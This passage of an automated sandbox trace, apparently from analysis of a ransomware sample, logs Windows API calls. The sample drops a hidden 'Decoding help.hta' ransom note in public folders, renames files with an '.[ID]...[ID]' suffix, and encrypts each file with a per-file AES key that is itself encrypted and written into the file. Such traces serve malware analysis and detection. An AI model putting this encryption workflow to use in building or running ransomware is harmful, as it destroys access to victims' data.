ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.515] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.515] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.515] FindNextFileW (in: hFindFile=0x5a5eb0, lpFindFileData=0x11c5fd30 | out: lpFindFileData=0x11c5fd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2839e1d0, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2839e1d0, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288f9359, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x58, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0040.516] lstrcpyW (in: lpString1=0x9a73010, lpString2="\\\\?\\C:\\Users\\Public\\Libraries\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Libraries\\*.*") returned="\\\\?\\C:\\Users\\Public\\Libraries\\*.*" [0040.516] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Libraries\\*.*") returned 33 [0040.516] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Libraries\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\Public\\Libraries\\Decoding help.hta") returned="\\\\?\\C:\\Users\\Public\\Libraries\\Decoding help.hta" [0040.516] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\Decoding help.hta" (normalized: "c:\\users\\public\\libraries\\decoding help.hta")) returned 0xffffffff [0040.516] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\Decoding help.hta" (normalized: "c:\\users\\public\\libraries\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0041.492] WriteFile (in: hFile=0x1b8, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x11c5fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x11c5fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0041.493] CloseHandle (hObject=0x1b8) returned 1 [0041.493] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.493] lstrcmpiW (lpString1="Decoding help.hta", lpString2="desktop.ini") returned -1 [0041.493] lstrlenW (lpString="desktop.ini") returned 11 [0041.493] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Public\\Libraries\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Libraries\\*.*") returned="\\\\?\\C:\\Users\\Public\\Libraries\\*.*" [0041.493] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Libraries\\*.*") returned 33 [0041.493] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Libraries\\", lpString2="desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini") returned="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini" [0041.493] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini") returned="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini" [0041.493] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" [0041.493] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini" (normalized: "c:\\users\\public\\libraries\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\public\\libraries\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0041.494] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\public\\libraries\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0041.494] CreateFileMappingA (hFile=0x1b8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x360 [0041.494] CryptAcquireContextA (in: phProv=0x11c5fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x11c5fcec*=0x3449c60) returned 1 [0043.855] CryptGenKey (in: hProv=0x3449c60, Algid=0x6610, dwFlags=0x1, phKey=0x11c5fce8 | out: phKey=0x11c5fce8*=0x5a6030) returned 1 [0043.855] CryptExportKey (in: hKey=0x5a6030, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x11c5fbe4, pdwDataLen=0x11c5fce4 | out: pbData=0x11c5fbe4*, pdwDataLen=0x11c5fce4*=0x2c) returned 1 [0043.855] MapViewOfFile (hFileMappingObject=0x360, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x40) returned 0x3a30000 [0044.191] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x11c5fbe4*, pdwDataLen=0x11c5fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x11c5fbe4*, pdwDataLen=0x11c5fcf8*=0x100) returned 1 [0047.308] CryptEncrypt (in: hKey=0x5a6030, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3a30000*, pdwDataLen=0x11c5fce4*=0x40, dwBufLen=0x40 | out: pbData=0x3a30000*, pdwDataLen=0x11c5fce4*=0x40) returned 1 [0047.308] UnmapViewOfFile (lpBaseAddress=0x3a30000) returned 1 [0047.310] CloseHandle (hObject=0x360) returned 1 [0047.310] CryptDestroyKey (hKey=0x5a6030) returned 1 [0047.310] CryptReleaseContext (hProv=0x3449c60, dwFlags=0x0) returned 1 [0047.310] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0047.310] WriteFile (in: hFile=0x1b8, lpBuffer=0x11c5fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x11c5fcf8, lpOverlapped=0x0 | out: lpBuffer=0x11c5fbe4*, lpNumberOfBytesWritten=0x11c5fcf8*=0x100, lpOverlapped=0x0) returned 1 [0047.629] WriteFile (in: hFile=0x1b8, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x11c5fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x11c5fcf8*=0x500, lpOverlapped=0x0) returned 1 [0047.629] CloseHandle (hObject=0x1b8) returned 1 [0047.630] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0050.371] FindNextFileW (in: hFindFile=0x5a5eb0, lpFindFileData=0x11c5fd30 | out: lpFindFileData=0x11c5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2837806f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x289b7a3b, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x36c, dwReserved0=0x0, dwReserved1=0x0, cFileName="RecordedTV.library-ms", cAlternateFileName="RECORD~1.LIB")) returned 1 [0050.371] lstrcpyW (in: lpString1=0x25197a78, lpString2="\\\\?\\C:\\Users\\Public\\Libraries\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Libraries\\*.*") returned="\\\\?\\C:\\Users\\Public\\Libraries\\*.*" [0050.371] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Libraries\\*.*") returned 33 [0050.371] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Libraries\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\Public\\Libraries\\Decoding help.hta") returned="\\\\?\\C:\\Users\\Public\\Libraries\\Decoding help.hta" [0050.371] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\Decoding help.hta" (normalized: "c:\\users\\public\\libraries\\decoding help.hta")) returned 0x1 [0050.371] lstrcmpiW (lpString1="Decoding help.hta", lpString2="RecordedTV.library-ms") returned -1 [0050.371] lstrlenW (lpString="RecordedTV.library-ms") returned 21 [0050.371] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Public\\Libraries\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Libraries\\*.*") returned="\\\\?\\C:\\Users\\Public\\Libraries\\*.*" [0050.371] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Libraries\\*.*") returned 33 [0050.371] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Libraries\\", lpString2="RecordedTV.library-ms" | out: lpString1="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms") returned="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" [0050.371] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" | out: lpString1="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms") returned="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" [0050.372] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.[ID]g9uZrLhJaygpwRm1[ID]" [0050.372] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0053.652] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x698 [0053.652] CreateFileMappingA (hFile=0x698, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x224 [0053.652] CryptAcquireContextA (in: phProv=0x11c5fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x11c5fcec*=0x3449358) returned 1 [0055.112] CryptGenKey (in: hProv=0x3449358, Algid=0x6610, dwFlags=0x1, phKey=0x11c5fce8 | out: phKey=0x11c5fce8*=0x5db9b8) returned 1 [0055.112] CryptExportKey (in: hKey=0x5db9b8, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x11c5fbe4, pdwDataLen=0x11c5fce4 | out: pbData=0x11c5fbe4*, pdwDataLen=0x11c5fce4*=0x2c) returned 1 [0055.112] MapViewOfFile (hFileMappingObject=0x224, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x360) returned 0x2d0000 [0055.123] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x11c5fbe4*, pdwDataLen=0x11c5fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x11c5fbe4*, pdwDataLen=0x11c5fcf8*=0x100) returned 1 [0055.123] CryptEncrypt (in: hKey=0x5db9b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d0000*, pdwDataLen=0x11c5fce4*=0x360, dwBufLen=0x360 | out: pbData=0x2d0000*, pdwDataLen=0x11c5fce4*=0x360) returned 1 [0055.123] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0055.125] CloseHandle (hObject=0x224) returned 1 [0055.125] CryptDestroyKey (hKey=0x5db9b8) returned 1 [0055.125] CryptReleaseContext (hProv=0x3449358, dwFlags=0x0) returned 1 [0055.125] SetFilePointerEx (in: hFile=0x698, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0055.125] WriteFile (in: hFile=0x698, lpBuffer=0x11c5fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x11c5fcf8, lpOverlapped=0x0 | out: lpBuffer=0x11c5fbe4*, lpNumberOfBytesWritten=0x11c5fcf8*=0x100, lpOverlapped=0x0) returned 1 [0056.953] WriteFile (in: hFile=0x698, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x11c5fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x11c5fcf8*=0x500, lpOverlapped=0x0) returned 1 [0056.953] CloseHandle (hObject=0x698) returned 1 [0056.953] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0058.518] FindNextFileW (in: hFindFile=0x5a5eb0, lpFindFileData=0x11c5fd30 | out: lpFindFileData=0x11c5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2837806f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x289b7a3b, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x36c, dwReserved0=0x0, dwReserved1=0x0, cFileName="RecordedTV.library-ms", cAlternateFileName="RECORD~1.LIB")) returned 0 [0058.518] FindClose (in: hFindFile=0x5a5eb0 | out: hFindFile=0x5a5eb0) returned 1 Thread: id = 226 os_tid = 0x6a8 [0040.517] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\*.*", lpFindFileData=0x11d9fd30 | out: lpFindFileData=0x11d9fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd9b5b52, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d88d0 [0042.043] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.043] FindNextFileW (in: hFindFile=0x5d88d0, lpFindFileData=0x11d9fd30 | out: lpFindFileData=0x11d9fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd9b5b52, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.043] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.043] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.043] FindNextFileW (in: hFindFile=0x5d88d0, lpFindFileData=0x11d9fd30 | out: lpFindFileData=0x11d9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xa68726b4, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 1 [0042.043] lstrcmpW (lpString1=".", lpString2="Connections") returned -1 [0042.043] lstrcmpW (lpString1="..", lpString2="Connections") returned -1 [0042.043] lstrcmpiW (lpString1="windows", lpString2="Connections") returned 1 [0042.044] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\*.*" [0042.044] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\*.*") returned 40 [0042.044] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\", lpString2="Connections" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections" [0042.044] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\*.*" [0042.044] GlobalMemoryStatus (in: lpBuffer=0x11d9fd10 | out: lpBuffer=0x11d9fd10) [0042.044] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x96ba028, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x504 [0042.044] CloseHandle (hObject=0x504) returned 1 [0042.045] FindNextFileW (in: hFindFile=0x5d88d0, lpFindFileData=0x11d9fd30 | out: lpFindFileData=0x11d9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x7606ea15, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x7606ea15, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloader", cAlternateFileName="DOWNLO~1")) returned 1 [0042.045] lstrcmpW (lpString1=".", lpString2="Downloader") returned -1 [0042.045] lstrcmpW (lpString1="..", lpString2="Downloader") returned -1 [0042.045] lstrcmpiW (lpString1="windows", lpString2="Downloader") returned 1 [0042.045] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\*.*" [0042.045] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\*.*") returned 40 [0042.045] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\", lpString2="Downloader" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader" [0042.045] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\*.*" [0042.045] GlobalMemoryStatus (in: lpBuffer=0x11d9fd10 | out: lpBuffer=0x11d9fd10) [0042.045] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x98ca918, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x504 [0042.046] CloseHandle (hObject=0x504) returned 1 [0042.046] FindNextFileW (in: hFindFile=0x5d88d0, lpFindFileData=0x11d9fd30 | out: lpFindFileData=0x11d9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x7606ea15, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x7606ea15, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloader", cAlternateFileName="DOWNLO~1")) returned 0 [0042.046] FindClose (in: hFindFile=0x5d88d0 | out: hFindFile=0x5d88d0) returned 1 Thread: id = 227 os_tid = 0x4f0 [0040.517] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Music\\*.*", lpFindFileData=0x11edfd30 | out: lpFindFileData=0x11edfd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5ef0 [0040.517] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.518] FindNextFileW (in: hFindFile=0x5a5ef0, lpFindFileData=0x11edfd30 | out: lpFindFileData=0x11edfd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.520] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.520] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.520] FindNextFileW (in: hFindFile=0x5a5ef0, lpFindFileData=0x11edfd30 | out: lpFindFileData=0x11edfd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28305c4e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0040.520] lstrcpyW (in: lpString1=0x5d205f8, lpString2="\\\\?\\C:\\Users\\Public\\Music\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\*.*") returned="\\\\?\\C:\\Users\\Public\\Music\\*.*" [0040.520] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\*.*") returned 29 [0040.520] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Music\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\Decoding help.hta") returned="\\\\?\\C:\\Users\\Public\\Music\\Decoding help.hta" [0040.520] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Decoding help.hta" (normalized: "c:\\users\\public\\music\\decoding help.hta")) returned 0xffffffff [0040.520] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Decoding help.hta" (normalized: "c:\\users\\public\\music\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0040.797] WriteFile (in: hFile=0x334, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x11edfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x11edfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0040.798] CloseHandle (hObject=0x334) returned 1 [0040.798] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.257] lstrcmpiW (lpString1="Decoding help.hta", lpString2="desktop.ini") returned -1 [0041.258] lstrlenW (lpString="desktop.ini") returned 11 [0041.258] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Public\\Music\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\*.*") returned="\\\\?\\C:\\Users\\Public\\Music\\*.*" [0041.258] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\*.*") returned 29 [0041.258] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Music\\", lpString2="desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini") returned="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini" [0041.258] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini") returned="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini" [0041.258] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" [0041.258] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\public\\music\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0041.258] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\public\\music\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0041.259] CreateFileMappingA (hFile=0x424, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x428 [0041.259] CryptAcquireContextA (in: phProv=0x11edfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x11edfcec*=0x3449710) returned 1 [0043.833] CryptGenKey (in: hProv=0x3449710, Algid=0x6610, dwFlags=0x1, phKey=0x11edfce8 | out: phKey=0x11edfce8*=0x5d8790) returned 1 [0043.833] CryptExportKey (in: hKey=0x5d8790, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x11edfbe4, pdwDataLen=0x11edfce4 | out: pbData=0x11edfbe4*, pdwDataLen=0x11edfce4*=0x2c) returned 1 [0043.833] MapViewOfFile (hFileMappingObject=0x428, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x160) returned 0x4520000 [0045.652] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x11edfbe4*, pdwDataLen=0x11edfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x11edfbe4*, pdwDataLen=0x11edfcf8*=0x100) returned 1 [0048.851] CryptEncrypt (in: hKey=0x5d8790, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4520000*, pdwDataLen=0x11edfce4*=0x160, dwBufLen=0x160 | out: pbData=0x4520000*, pdwDataLen=0x11edfce4*=0x160) returned 1 [0048.851] UnmapViewOfFile (lpBaseAddress=0x4520000) returned 